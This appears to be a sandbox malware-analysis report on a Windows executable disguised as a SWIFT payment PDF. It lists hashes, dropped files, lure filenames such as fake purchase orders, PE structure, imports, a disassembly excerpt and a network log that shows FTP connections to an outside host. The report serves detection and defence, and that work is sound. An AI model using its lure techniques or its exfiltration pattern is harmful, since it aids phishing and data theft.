                                                      Reputation:low
                                                      Preview:...55PLO2GXJ.NL.H3OTQXOtTVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVU.XB58O.A6.Q...O..ig'="x?F;1 78d;#[X?8oT"x8G n%#hw..q5 P1x_[_`XB56PLO^W.g.?.2a9.1x .1.w),i$.&I...g>.9t;.0.=.6.l:/D>.*dq?+.).K.s71.6.4`'-$a9.1TQXO4TVRVUDXB56PsE^!XJ2N..MH.NPQ,.4.VRVUDXB5.PoN=FQJ2.OLM.1OTQXO..VRVEDXB.7PLOvGXZ2NNNMH6OTQXO4TSRVUDXB56 HO6CXJ.uLLOH3.TQHO4DVRVUTXB%6PLO6GHJ2NNLMH3OTQ.Z6T.RVUD8@5VSNO6GXJ2NNLMH3OTQXO4TVRVUDX..7PPO6GXJ2NNLMH3OTQXO4TVRVUDXB5.]NOvGXJ2NNLMH3OT.YO.UVRVUDXB56PLO6GXJ2NNLMH3OTQv;Q,"RVU\.C56@LO6.YJ2JNLMH3OTQXO4TVRvUD8lGR18.6G.'2NN.LH3!TQX.5TVRVUDXB56PLOvGX..*/8,H3O.aXO4tTRVCDXB?4PLO6GXJ2NNLMHsOT.v=G&5RVU$[@560NO6CZJ2nLLMH3OTQXO4TVR.UD.B56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6GXJ2NNLMH3OTQXO4TVRVUDXB56PLO6G
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:modified
                                                      Size (bytes):45984
                                                      Entropy (8bit):6.16795797263964
                                                      Encrypted:false
                                                      SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                      MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                      SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                      SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                      SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                      Joe Sandbox View:
                                                      • Filename: Order Specifications for Materials.docx.exe, Detection: malicious, Browse
                                                      • Filename: 9348000 EDT8 EDQ-905.pdf.exe, Detection: malicious, Browse
                                                      • Filename: New_Order_568330_Material_Specifications.exe, Detection: malicious, Browse
                                                      • Filename: Dokument_2024-10-24_135211.exe, Detection: malicious, Browse
                                                      • Filename: z14Employee_Contract_pdf.exe, Detection: malicious, Browse
                                                      • Filename: purchase order.exe, Detection: malicious, Browse
                                                      • Filename: M.BL CSLEBKK2311030B.exe, Detection: malicious, Browse
                                                      • Filename: PO #89230.exe, Detection: malicious, Browse
                                                      • Filename: FZCO - PO#12345.exe, Detection: malicious, Browse
                                                      • Filename: POX455U90897QD.exe, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                      Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1141
                                                      Entropy (8bit):4.442398121585593
                                                      Encrypted:false
                                                      SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                      MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                      SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                      SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                      SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                      Malicious:false
                                                      Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.487927341462559
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 95.11%
                                                      • AutoIt3 compiled script executable (510682/80) 4.86%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:z20SWIFT_MT103_Payment_552016_pdf.exe
                                                      File size:1'286'373 bytes
                                                      MD5:7251aef1d7960be902f604768ff93a1a
                                                      SHA1:275dbaf6d2a5c301d9de9d8ec77cac54c8771c1f
                                                      SHA256:66e68902e968ac5c762b7d4950df70b2ef8125d38d6884ff9e37e72542e47b68
                                                      SHA512:d491be282bec8ba21f19a04f10b47360509754a5dd2578893ab71cd489053ae7704656c0aa6d9758958c651d631f4ed8c2004a3ab08aa824897396221adde0e2
                                                      SSDEEP:24576:ffmMv6Ckr7Mny5QLvxTcQ9HzBYLoz1zopMFd3B88:f3v+7/5QLvdSEfFdf
                                                      TLSH:4555F112B7D680B6D9A339B0293BE32BEB3575194333C48BA7E02E769F111515B37362
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                      Icon Hash:1733312925935517
                                                      Entrypoint:0x416310
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                      Instruction
                                                      call 00007FA0F891AF3Ch
                                                      jmp 00007FA0F890ED0Eh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push ebp
                                                      mov ebp, esp
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [ebp+0Ch]
                                                      mov ecx, dword ptr [ebp+10h]
                                                      mov edi, dword ptr [ebp+08h]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007FA0F890EE9Ah
                                                      cmp edi, eax
                                                      jc 00007FA0F890F03Ah
                                                      cmp ecx, 00000100h
                                                      jc 00007FA0F890EEB1h
                                                      cmp dword ptr [004A94E0h], 00000000h
                                                      je 00007FA0F890EEA8h
                                                      push edi
                                                      push esi
                                                      and edi, 0Fh
                                                      and esi, 0Fh
                                                      cmp edi, esi
                                                      pop esi
                                                      pop edi
                                                      jne 00007FA0F890EE9Ah
                                                      pop esi
                                                      pop edi
                                                      pop ebp
                                                      jmp 00007FA0F890F2FAh
                                                      test edi, 00000003h
                                                      jne 00007FA0F890EEA7h
                                                      shr ecx, 02h
                                                      and edx, 03h
                                                      cmp ecx, 08h
                                                      jc 00007FA0F890EEBCh
                                                      rep movsd
                                                      jmp dword ptr [00416494h+edx*4]
                                                      nop
                                                      mov eax, edi
                                                      mov edx, 00000003h
                                                      sub ecx, 04h
                                                      jc 00007FA0F890EE9Eh
                                                      and eax, 03h
                                                      add ecx, eax
                                                      jmp dword ptr [004163A8h+eax*4]
                                                      jmp dword ptr [004164A4h+ecx*4]
                                                      nop
                                                      jmp dword ptr [00416428h+ecx*4]
                                                      nop
                                                      mov eax, E4004163h
                                                      arpl word ptr [ecx+00h], ax
                                                      or byte ptr [ecx+eax*2+00h], ah
                                                      and edx, ecx
                                                      mov al, byte ptr [esi]
                                                      mov byte ptr [edi], al
                                                      mov al, byte ptr [esi+01h]
                                                      mov byte ptr [edi+01h], al
                                                      mov al, byte ptr [esi+02h]
                                                      shr ecx, 02h
                                                      mov byte ptr [edi+02h], al
                                                      add esi, 03h
                                                      add edi, 03h
                                                      cmp ecx, 08h
                                                      jc 00007FA0F890EE5Eh
                                                      Programming Language:
                                                      • [ASM] VS2008 SP1 build 30729
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [C++] VS2008 SP1 build 30729
                                                      • [ C ] VS2005 build 50727
                                                      • [IMP] VS2005 build 50727
                                                      • [ASM] VS2008 build 21022
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 SP1 build 30729
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                      RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                      RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                      RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                      RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                      RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                      RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                      RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                      RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                      RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                      RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                      RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                      RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                      RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                      RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                      RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                      RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                      RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                      RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                      DLLImport
                                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                      GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                      OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain
                                                      EnglishUnited States
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 29, 2024 02:32:01.516565084 CET49730443192.168.2.4104.26.12.205
                                                      Oct 29, 2024 02:32:01.516654968 CET44349730104.26.12.205192.168.2.4
                                                      Oct 29, 2024 02:32:01.516748905 CET49730443192.168.2.4104.26.12.205
                                                      Oct 29, 2024 02:32:01.525824070 CET49730443192.168.2.4104.26.12.205
                                                      Oct 29, 2024 02:32:01.525862932 CET44349730104.26.12.205192.168.2.4
                                                      Oct 29, 2024 02:32:03.182288885 CET44349730104.26.12.205192.168.2.4
                                                      Oct 29, 2024 02:32:03.182418108 CET49730443192.168.2.4104.26.12.205
                                                      Oct 29, 2024 02:32:03.186178923 CET49730443192.168.2.4104.26.12.205
                                                      Oct 29, 2024 02:32:03.186206102 CET44349730104.26.12.205192.168.2.4
                                                      Oct 29, 2024 02:32:03.186670065 CET44349730104.26.12.205192.168.2.4
                                                      Oct 29, 2024 02:32:03.231246948 CET49730443192.168.2.4104.26.12.205
                                                      Oct 29, 2024 02:32:03.275373936 CET44349730104.26.12.205192.168.2.4
                                                      Oct 29, 2024 02:32:03.406300068 CET44349730104.26.12.205192.168.2.4
                                                      Oct 29, 2024 02:32:03.406387091 CET44349730104.26.12.205192.168.2.4
                                                      Oct 29, 2024 02:32:03.406466961 CET49730443192.168.2.4104.26.12.205
                                                      Oct 29, 2024 02:32:03.412775993 CET49730443192.168.2.4104.26.12.205
                                                      Oct 29, 2024 02:32:04.416785955 CET4973121192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:04.422257900 CET2149731110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:04.422338963 CET4973121192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:04.425255060 CET4973121192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:04.430704117 CET2149731110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:04.430767059 CET4973121192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:04.451747894 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:04.457578897 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:04.457680941 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:05.374852896 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:05.375848055 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:05.381302118 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:05.711447954 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:05.711733103 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:05.717112064 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:06.073821068 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:06.074178934 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:06.079596043 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:06.409559965 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:06.409715891 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:06.415169954 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:06.745172024 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:06.745539904 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:06.751086950 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:07.081208944 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:07.081500053 CET4973221192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:07.087435961 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:07.417788982 CET2149732110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:07.418298960 CET4973364346192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:32:07.423712969 CET6434649733110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:32:07.423789978 CET4973364346192.168.2.4110.4.45.197
